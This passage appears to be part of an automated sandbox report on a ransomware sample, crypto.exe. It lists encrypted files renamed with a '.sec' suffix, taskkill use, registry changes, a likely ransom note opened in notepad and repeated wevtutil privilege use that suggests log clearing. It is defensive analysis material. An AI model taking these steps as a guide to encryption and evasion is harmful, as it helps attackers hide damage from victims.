File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-lib-uihandler.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099167.JPG.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0222019.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18246_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\TEXTBOX.JPG.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.databinding.property.nl_ja_4.4.0.v20140623020002.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\lua\intf\modules\httprequests.luac.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD15020_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\GrayCheck\HEADER.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PEOPLEDATAHANDLER.DLL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\mset7es.kic.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\Push\NavigationLeft_ButtonGraphic.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA02009_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\MEDIA\EXPLODE.WAV.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0313970.JPG.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.help.base.nl_ja_4.4.0.v20140623020002.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME31.CSS.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\Slate\TAB_OFF.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBWIZ\DGPICCAP.XML.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Templates\1033\UrbanMergeLetter.Dotx.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\en-US\gadget.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.rcp_4.4.0.v20141007-2301\META-INF\MANIFEST.MF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\MediaCenter.Gadget\images\button_right_mousedown.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\CPU.Gadget\images\dialdot.png.Id-TTOHRFUMG.sec	crypto.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_CA.txt	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0216516.WMF.Id-TTOHRFUMG.sec	crypto.exe

Kills process with taskkill 3 IoCs

evasion

pid	Process
1804	taskkill.exe
1996	taskkill.exe
2020	taskkill.exe

Modifies Internet Explorer settings 1 TTPs 38 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Internet Explorer\User Preferences\88D7D0879DAB32E14DE5B3A805A34F98AFF34F5977 = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000db80177e3b59114e93293ac7aa629b960000000002000000000010660000000100002000000087401d6d5c5b7dbd89e40fe7931babc664ce9639c80bfd3348b40fddd534acaa000000000e8000000002000020000000cc11aaec2dce4fbf54f7415275fa5b783caee8e87b884a54b7e59b1956f27f1b500000001e71000a469356020eccca72afa99887dd27bab57435261aad55fd81515ed919bad54e8aa83129e2171f56aa3e2614b4cb802613111b4a2bd0d8daf59e1e651e3ccabe09c55f34d814f9d51ed0d27601400000004ae0de762abf1e4c09df3e75e82df3cbc3dee6dcd853ddc871ee6c20d858e32699fa85fafd67146ca4199c2aca1db6f60ed593352cd1c406dcddf415f44a6609	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000db80177e3b59114e93293ac7aa629b9600000000020000000000106600000001000020000000f31d4974c488f1b6457dc1149a7730147e645c66230683efb40255ddc0e96d12000000000e800000000200002000000063fe3b3649e2894062f33347d69f3e3af006a657d203098db5bfd923780d025f20000000724bf9548935058f4e47d7b2b3dc7997803463453b1ac1cf3a9929d656334efb400000006e8c79126587f747db1f17b8cdc629664a1bcb7861e1cb12e820f4337f5efb31e9a8b49d7f7d6a3d43c38cafd5aae9401ab1d66a8c6404f95d486591edac170f	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 107a380fa191d601	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Internet Explorer\GPU	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Internet Explorer\Zoom	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Internet Explorer\InternetRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Internet Explorer\LowRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Internet Explorer\SearchScopes	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Internet Explorer\User Preferences	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Internet Explorer\MINIE	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Internet Explorer\IETld\LowMic	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{39E05051-FD94-11EA-94BC-4A32AC2F416F} = "0"	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Internet Explorer\PageSetup	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Internet Explorer\IntelliForms	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Internet Explorer\Toolbar	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	IEXPLORE.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Internet Explorer\SearchScopes\DefaultScope = "{0633EE93-D776-472f-A0FF-E1416B8B2E3A}"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Internet Explorer\User Preferences\2D53CFFC5C1A3DD2E97B7979AC2A92BD59BC839E81 = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000db80177e3b59114e93293ac7aa629b9600000000020000000000106600000001000020000000f1f5f7ddbf7b228f797b4f5fb087e188c202398784b89c090e57b8c48d3ed422000000000e8000000002000020000000f821c5b1c28544f6e0a1ebc7ae90d2825d5c5a5a5d382ca1f0739efd87c7df941000000064dbba7f48a128016209b36eb9e781ef40000000566debcd955daea7529daca88d75ec09bd5d627f0a28630f9c67377c8a2770e0fc5bba7ad323b12eb92b912e1d2f7a9120a032637d8e95ddad22bcecf077b736	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Internet Explorer\MINIE\TabBandWidth = "500"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000db80177e3b59114e93293ac7aa629b9600000000020000000000106600000001000020000000fd722c783e4f25f17de94a3f8e0e6838c642c8a4b4e75cb2e2412e36ada2062a000000000e800000000200002000000063aaefc79f7581e204a0f84827ed06a034a43fa8cf84bd556f360ee134cc58e5900000002e041868134f0935cbd21625d0f97dc89ea3befc182beb6ef569fb0e4b64f6ba6c116f7a834f2990e4ea691f53bc9d08ad5324ad91b51940719081c268bb1f19ebd876ce0eaf0a4a87ace1cc23246874191117c00741f24c9f157d621fc51379a32aea2eced1faf564319d2fae0d17c9526cbad4c4689e307dc6c7e43596d8922008c7d7ac4a6ccf286a1525a6ea2c124000000035594b6d6556c21a572c7a96d21ff885af093479ca4d07e8971e31ac49739c2e829f608bfbbe48b47957ff3059745ffa859989259696d9a97fd93b5e5bcc6b81	iexplore.exe

Modifies registry class 3 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.sec\DefaultIcon	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.sec	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.sec\DefaultIcon\ = "C:\\Windows\\System32\\SHELL32.dll,152"	reg.exe

Opens file in notepad (likely ransom note) 1 IoCs

ransomware

pid	Process
1800	NOTEPAD.EXE

Runs net.exe

Suspicious behavior: CmdExeWriteProcessMemorySpam 2 IoCs

pid	Process
1048	powershell.exe
928	powershell.exe

Suspicious behavior: EnumeratesProcesses 4 IoCs

pid	Process
1048	powershell.exe
1048	powershell.exe
928	powershell.exe
928	powershell.exe

Suspicious use of AdjustPrivilegeToken 1011 IoCs

description	pid	Process
Token: SeDebugPrivilege	1804	taskkill.exe
Token: SeDebugPrivilege	1996	taskkill.exe
Token: SeDebugPrivilege	2020	taskkill.exe
Token: SeDebugPrivilege	1048	powershell.exe
Token: SeDebugPrivilege	928	powershell.exe
Token: SeSecurityPrivilege	300	wevtutil.exe
Token: SeBackupPrivilege	300	wevtutil.exe
Token: SeSecurityPrivilege	1608	wevtutil.exe
Token: SeBackupPrivilege	1608	wevtutil.exe
Token: SeSecurityPrivilege	2044	wevtutil.exe
Token: SeBackupPrivilege	2044	wevtutil.exe
Token: SeSecurityPrivilege	1512	wevtutil.exe
Token: SeBackupPrivilege	1512	wevtutil.exe
Token: SeSecurityPrivilege	1564	wevtutil.exe
Token: SeBackupPrivilege	1564	wevtutil.exe
Token: SeSecurityPrivilege	1400	wevtutil.exe
Token: SeBackupPrivilege	1400	wevtutil.exe
Token: SeSecurityPrivilege	1944	wevtutil.exe
Token: SeBackupPrivilege	1944	wevtutil.exe
Token: SeSecurityPrivilege	1960	wevtutil.exe
Token: SeBackupPrivilege	1960	wevtutil.exe
Token: SeSecurityPrivilege	1968	wevtutil.exe
Token: SeBackupPrivilege	1968	wevtutil.exe
Token: SeSecurityPrivilege	1136	wevtutil.exe
Token: SeBackupPrivilege	1136	wevtutil.exe
Token: SeSecurityPrivilege	1088	wevtutil.exe
Token: SeBackupPrivilege	1088	wevtutil.exe
Token: SeSecurityPrivilege	1972	wevtutil.exe
Token: SeBackupPrivilege	1972	wevtutil.exe
Token: SeSecurityPrivilege	1788	wevtutil.exe
Token: SeBackupPrivilege	1788	wevtutil.exe
Token: SeSecurityPrivilege	1988	wevtutil.exe
Token: SeBackupPrivilege	1988	wevtutil.exe
Token: SeSecurityPrivilege	2004	wevtutil.exe
Token: SeBackupPrivilege	2004	wevtutil.exe
Token: SeSecurityPrivilege	1220	wevtutil.exe
Token: SeBackupPrivilege	1220	wevtutil.exe
Token: SeSecurityPrivilege	1060	wevtutil.exe
Token: SeBackupPrivilege	1060	wevtutil.exe
Token: SeSecurityPrivilege	1840	wevtutil.exe
Token: SeBackupPrivilege	1840	wevtutil.exe
Token: SeSecurityPrivilege	624	wevtutil.exe
Token: SeBackupPrivilege	624	wevtutil.exe
Token: SeSecurityPrivilege	1040	wevtutil.exe
Token: SeBackupPrivilege	1040	wevtutil.exe
Token: SeSecurityPrivilege	1688	wevtutil.exe
Token: SeBackupPrivilege	1688	wevtutil.exe
Token: SeSecurityPrivilege	328	wevtutil.exe
Token: SeBackupPrivilege	328	wevtutil.exe
Token: SeSecurityPrivilege	2032	wevtutil.exe
Token: SeBackupPrivilege	2032	wevtutil.exe
Token: SeSecurityPrivilege	1152	wevtutil.exe
Token: SeBackupPrivilege	1152	wevtutil.exe
Token: SeSecurityPrivilege	1880	wevtutil.exe
Token: SeBackupPrivilege	1880	wevtutil.exe
Token: SeSecurityPrivilege	972	wevtutil.exe
Token: SeBackupPrivilege	972	wevtutil.exe
Token: SeSecurityPrivilege	1272	wevtutil.exe
Token: SeBackupPrivilege	1272	wevtutil.exe
Token: SeSecurityPrivilege	1076	wevtutil.exe
Token: SeBackupPrivilege	1076	wevtutil.exe
Token: SeSecurityPrivilege	1232	wevtutil.exe
Token: SeBackupPrivilege	1232	wevtutil.exe
Token: SeSecurityPrivilege	316	wevtutil.exe
Token: SeBackupPrivilege	316	wevtutil.exe
Token: SeSecurityPrivilege	1608	wevtutil.exe
Token: SeBackupPrivilege	1608	wevtutil.exe
Token: SeSecurityPrivilege	2044	wevtutil.exe
Token: SeBackupPrivilege	2044	wevtutil.exe
Token: SeSecurityPrivilege	1512	wevtutil.exe
Token: SeBackupPrivilege	1512	wevtutil.exe
Token: SeSecurityPrivilege	1564	wevtutil.exe
Token: SeBackupPrivilege	1564	wevtutil.exe
Token: SeSecurityPrivilege	1400	wevtutil.exe
Token: SeBackupPrivilege	1400	wevtutil.exe
Token: SeSecurityPrivilege	1944	wevtutil.exe
Token: SeBackupPrivilege	1944	wevtutil.exe
Token: SeSecurityPrivilege	1960	wevtutil.exe
Token: SeBackupPrivilege	1960	wevtutil.exe
Token: SeSecurityPrivilege	1968	wevtutil.exe
Token: SeBackupPrivilege	1968	wevtutil.exe
Token: SeSecurityPrivilege	1136	wevtutil.exe
Token: SeBackupPrivilege	1136	wevtutil.exe
Token: SeSecurityPrivilege	1088	wevtutil.exe
Token: SeBackupPrivilege	1088	wevtutil.exe
Token: SeSecurityPrivilege	1972	wevtutil.exe
Token: SeBackupPrivilege	1972	wevtutil.exe
Token: SeSecurityPrivilege	1788	wevtutil.exe
Token: SeBackupPrivilege	1788	wevtutil.exe
Token: SeSecurityPrivilege	1988	wevtutil.exe
Token: SeBackupPrivilege	1988	wevtutil.exe
Token: SeSecurityPrivilege	2004	wevtutil.exe
Token: SeBackupPrivilege	2004	wevtutil.exe
Token: SeSecurityPrivilege	1220	wevtutil.exe
Token: SeBackupPrivilege	1220	wevtutil.exe
Token: SeSecurityPrivilege	1060	wevtutil.exe
Token: SeBackupPrivilege	1060	wevtutil.exe
Token: SeSecurityPrivilege	1840	wevtutil.exe
Token: SeBackupPrivilege	1840	wevtutil.exe
Token: SeSecurityPrivilege	624	wevtutil.exe
Token: SeBackupPrivilege	624	wevtutil.exe
Token: SeSecurityPrivilege	1040	wevtutil.exe
Token: SeBackupPrivilege	1040	wevtutil.exe
Token: SeSecurityPrivilege	1688	wevtutil.exe
Token: SeBackupPrivilege	1688	wevtutil.exe
Token: SeSecurityPrivilege	328	wevtutil.exe
Token: SeBackupPrivilege	328	wevtutil.exe
Token: SeSecurityPrivilege	2032	wevtutil.exe
Token: SeBackupPrivilege	2032	wevtutil.exe
Token: SeSecurityPrivilege	1152	wevtutil.exe
Token: SeBackupPrivilege	1152	wevtutil.exe
Token: SeSecurityPrivilege	1880	wevtutil.exe
Token: SeBackupPrivilege	1880	wevtutil.exe
Token: SeSecurityPrivilege	972	wevtutil.exe
Token: SeBackupPrivilege	972	wevtutil.exe
Token: SeSecurityPrivilege	1272	wevtutil.exe
Token: SeBackupPrivilege	1272	wevtutil.exe
Token: SeSecurityPrivilege	1076	wevtutil.exe
Token: SeBackupPrivilege	1076	wevtutil.exe
Token: SeSecurityPrivilege	1232	wevtutil.exe
Token: SeBackupPrivilege	1232	wevtutil.exe
Token: SeSecurityPrivilege	316	wevtutil.exe
Token: SeBackupPrivilege	316	wevtutil.exe
Token: SeSecurityPrivilege	1608	wevtutil.exe
Token: SeBackupPrivilege	1608	wevtutil.exe
Token: SeSecurityPrivilege	2044	wevtutil.exe
Token: SeBackupPrivilege	2044	wevtutil.exe
Token: SeSecurityPrivilege	1512	wevtutil.exe
Token: SeBackupPrivilege	1512	wevtutil.exe
Token: SeSecurityPrivilege	1564	wevtutil.exe
Token: SeBackupPrivilege	1564	wevtutil.exe
Token: SeSecurityPrivilege	1400	wevtutil.exe
Token: SeBackupPrivilege	1400	wevtutil.exe
Token: SeSecurityPrivilege	1944	wevtutil.exe
Token: SeBackupPrivilege	1944	wevtutil.exe
Token: SeSecurityPrivilege	1960	wevtutil.exe
Token: SeBackupPrivilege	1960	wevtutil.exe
Token: SeSecurityPrivilege	1968	wevtutil.exe
Token: SeBackupPrivilege	1968	wevtutil.exe
Token: SeSecurityPrivilege	1136	wevtutil.exe
Token: SeBackupPrivilege	1136	wevtutil.exe
Token: SeSecurityPrivilege	1088	wevtutil.exe
Token: SeBackupPrivilege	1088	wevtutil.exe
Token: SeSecurityPrivilege	1972	wevtutil.exe
Token: SeBackupPrivilege	1972	wevtutil.exe
Token: SeSecurityPrivilege	1788	wevtutil.exe
Token: SeBackupPrivilege	1788	wevtutil.exe
Token: SeSecurityPrivilege	1988	wevtutil.exe
Token: SeBackupPrivilege	1988	wevtutil.exe
Token: SeSecurityPrivilege	2004	wevtutil.exe
Token: SeBackupPrivilege	2004	wevtutil.exe
Token: SeSecurityPrivilege	1220	wevtutil.exe
Token: SeBackupPrivilege	1220	wevtutil.exe
Token: SeSecurityPrivilege	1060	wevtutil.exe
Token: SeBackupPrivilege	1060	wevtutil.exe
Token: SeSecurityPrivilege	1840	wevtutil.exe
Token: SeBackupPrivilege	1840	wevtutil.exe
Token: SeSecurityPrivilege	624	wevtutil.exe
Token: SeBackupPrivilege	624	wevtutil.exe
Token: SeSecurityPrivilege	1040	wevtutil.exe
Token: SeBackupPrivilege	1040	wevtutil.exe
Token: SeSecurityPrivilege	1688	wevtutil.exe
Token: SeBackupPrivilege	1688	wevtutil.exe
Token: SeSecurityPrivilege	328	wevtutil.exe
Token: SeBackupPrivilege	328	wevtutil.exe
Token: SeSecurityPrivilege	2032	wevtutil.exe
Token: SeBackupPrivilege	2032	wevtutil.exe
Token: SeSecurityPrivilege	1152	wevtutil.exe
Token: SeBackupPrivilege	1152	wevtutil.exe
Token: SeSecurityPrivilege	1880	wevtutil.exe
Token: SeBackupPrivilege	1880	wevtutil.exe
Token: SeSecurityPrivilege	972	wevtutil.exe
Token: SeBackupPrivilege	972	wevtutil.exe
Token: SeSecurityPrivilege	1272	wevtutil.exe
Token: SeBackupPrivilege	1272	wevtutil.exe
Token: SeSecurityPrivilege	1076	wevtutil.exe
Token: SeBackupPrivilege	1076	wevtutil.exe
Token: SeSecurityPrivilege	1232	wevtutil.exe
Token: SeBackupPrivilege	1232	wevtutil.exe
Token: SeSecurityPrivilege	316	wevtutil.exe
Token: SeBackupPrivilege	316	wevtutil.exe
Token: SeSecurityPrivilege	1608	wevtutil.exe
Token: SeBackupPrivilege	1608	wevtutil.exe
Token: SeSecurityPrivilege	2044	wevtutil.exe
Token: SeBackupPrivilege	2044	wevtutil.exe
Token: SeSecurityPrivilege	1512	wevtutil.exe
Token: SeBackupPrivilege	1512	wevtutil.exe
Token: SeSecurityPrivilege	1564	wevtutil.exe
Token: SeBackupPrivilege	1564	wevtutil.exe
Token: SeSecurityPrivilege	1400	wevtutil.exe
Token: SeBackupPrivilege	1400	wevtutil.exe
Token: SeSecurityPrivilege	1944	wevtutil.exe
Token: SeBackupPrivilege	1944	wevtutil.exe
Token: SeSecurityPrivilege	1960	wevtutil.exe
Token: SeBackupPrivilege	1960	wevtutil.exe
Token: SeSecurityPrivilege	1968	wevtutil.exe
Token: SeBackupPrivilege	1968	wevtutil.exe
Token: SeSecurityPrivilege	1136	wevtutil.exe
Token: SeBackupPrivilege	1136	wevtutil.exe
Token: SeSecurityPrivilege	1088	wevtutil.exe
Token: SeBackupPrivilege	1088	wevtutil.exe
Token: SeSecurityPrivilege	1972	wevtutil.exe
Token: SeBackupPrivilege	1972	wevtutil.exe
Token: SeSecurityPrivilege	1788	wevtutil.exe
Token: SeBackupPrivilege	1788	wevtutil.exe
Token: SeSecurityPrivilege	1988	wevtutil.exe
Token: SeBackupPrivilege	1988	wevtutil.exe
Token: SeSecurityPrivilege	2004	wevtutil.exe
Token: SeBackupPrivilege	2004	wevtutil.exe
Token: SeSecurityPrivilege	1220	wevtutil.exe
Token: SeBackupPrivilege	1220	wevtutil.exe
Token: SeSecurityPrivilege	1060	wevtutil.exe
Token: SeBackupPrivilege	1060	wevtutil.exe
Token: SeSecurityPrivilege	1840	wevtutil.exe
Token: SeBackupPrivilege	1840	wevtutil.exe
Token: SeSecurityPrivilege	624	wevtutil.exe
Token: SeBackupPrivilege	624	wevtutil.exe
Token: SeSecurityPrivilege	1040	wevtutil.exe
Token: SeBackupPrivilege	1040	wevtutil.exe
Token: SeSecurityPrivilege	1688	wevtutil.exe
Token: SeBackupPrivilege	1688	wevtutil.exe
Token: SeSecurityPrivilege	328	wevtutil.exe
Token: SeBackupPrivilege	328	wevtutil.exe
Token: SeSecurityPrivilege	2032	wevtutil.exe
Token: SeBackupPrivilege	2032	wevtutil.exe
Token: SeSecurityPrivilege	1152	wevtutil.exe
Token: SeBackupPrivilege	1152	wevtutil.exe
Token: SeSecurityPrivilege	1880	wevtutil.exe
Token: SeBackupPrivilege	1880	wevtutil.exe
Token: SeSecurityPrivilege	972	wevtutil.exe
Token: SeBackupPrivilege	972	wevtutil.exe
Token: SeSecurityPrivilege	1272	wevtutil.exe
Token: SeBackupPrivilege	1272	wevtutil.exe
Token: SeSecurityPrivilege	1076	wevtutil.exe
Token: SeBackupPrivilege	1076	wevtutil.exe
Token: SeSecurityPrivilege	1232	wevtutil.exe
Token: SeBackupPrivilege	1232	wevtutil.exe
Token: SeSecurityPrivilege	316	wevtutil.exe
Token: SeBackupPrivilege	316	wevtutil.exe
Token: SeSecurityPrivilege	1608	wevtutil.exe
Token: SeBackupPrivilege	1608	wevtutil.exe
Token: SeSecurityPrivilege	2044	wevtutil.exe
Token: SeBackupPrivilege	2044	wevtutil.exe
Token: SeSecurityPrivilege	1512	wevtutil.exe
Token: SeBackupPrivilege	1512	wevtutil.exe
Token: SeSecurityPrivilege	1564	wevtutil.exe
Token: SeBackupPrivilege	1564	wevtutil.exe
Token: SeSecurityPrivilege	1400	wevtutil.exe
Token: SeBackupPrivilege	1400	wevtutil.exe
Token: SeSecurityPrivilege	1944	wevtutil.exe
Token: SeBackupPrivilege	1944	wevtutil.exe
Token: SeSecurityPrivilege	1960	wevtutil.exe
Token: SeBackupPrivilege	1960	wevtutil.exe
Token: SeSecurityPrivilege	1968	wevtutil.exe
Token: SeBackupPrivilege	1968	wevtutil.exe
Token: SeSecurityPrivilege	1136	wevtutil.exe
Token: SeBackupPrivilege	1136	wevtutil.exe
Token: SeSecurityPrivilege	1088	wevtutil.exe
Token: SeBackupPrivilege	1088	wevtutil.exe
Token: SeSecurityPrivilege	1972	wevtutil.exe
Token: SeBackupPrivilege	1972	wevtutil.exe
Token: SeSecurityPrivilege	1788	wevtutil.exe
Token: SeBackupPrivilege	1788	wevtutil.exe
Token: SeSecurityPrivilege	1988	wevtutil.exe
Token: SeBackupPrivilege	1988	wevtutil.exe
Token: SeSecurityPrivilege	2004	wevtutil.exe
Token: SeBackupPrivilege	2004	wevtutil.exe
Token: SeSecurityPrivilege	1220	wevtutil.exe
Token: SeBackupPrivilege	1220	wevtutil.exe
Token: SeSecurityPrivilege	1060	wevtutil.exe
Token: SeBackupPrivilege	1060	wevtutil.exe
Token: SeSecurityPrivilege	1840	wevtutil.exe
Token: SeBackupPrivilege	1840	wevtutil.exe
Token: SeSecurityPrivilege	624	wevtutil.exe
Token: SeBackupPrivilege	624	wevtutil.exe
Token: SeSecurityPrivilege	1040	wevtutil.exe
Token: SeBackupPrivilege	1040	wevtutil.exe
Token: SeSecurityPrivilege	1688	wevtutil.exe
Token: SeBackupPrivilege	1688	wevtutil.exe
Token: SeSecurityPrivilege	328	wevtutil.exe
Token: SeBackupPrivilege	328	wevtutil.exe
Token: SeSecurityPrivilege	2032	wevtutil.exe
Token: SeBackupPrivilege	2032	wevtutil.exe
Token: SeSecurityPrivilege	1152	wevtutil.exe
Token: SeBackupPrivilege	1152	wevtutil.exe
Token: SeSecurityPrivilege	1880	wevtutil.exe
Token: SeBackupPrivilege	1880	wevtutil.exe
Token: SeSecurityPrivilege	972	wevtutil.exe
Token: SeBackupPrivilege	972	wevtutil.exe
Token: SeSecurityPrivilege	1272	wevtutil.exe
Token: SeBackupPrivilege	1272	wevtutil.exe
Token: SeSecurityPrivilege	1076	wevtutil.exe
Token: SeBackupPrivilege	1076	wevtutil.exe
Token: SeSecurityPrivilege	1232	wevtutil.exe
Token: SeBackupPrivilege	1232	wevtutil.exe
Token: SeSecurityPrivilege	316	wevtutil.exe
Token: SeBackupPrivilege	316	wevtutil.exe
Token: SeSecurityPrivilege	1608	wevtutil.exe
Token: SeBackupPrivilege	1608	wevtutil.exe
Token: SeSecurityPrivilege	2044	wevtutil.exe
Token: SeBackupPrivilege	2044	wevtutil.exe
Token: SeSecurityPrivilege	1512	wevtutil.exe
Token: SeBackupPrivilege	1512	wevtutil.exe
Token: SeSecurityPrivilege	1564	wevtutil.exe
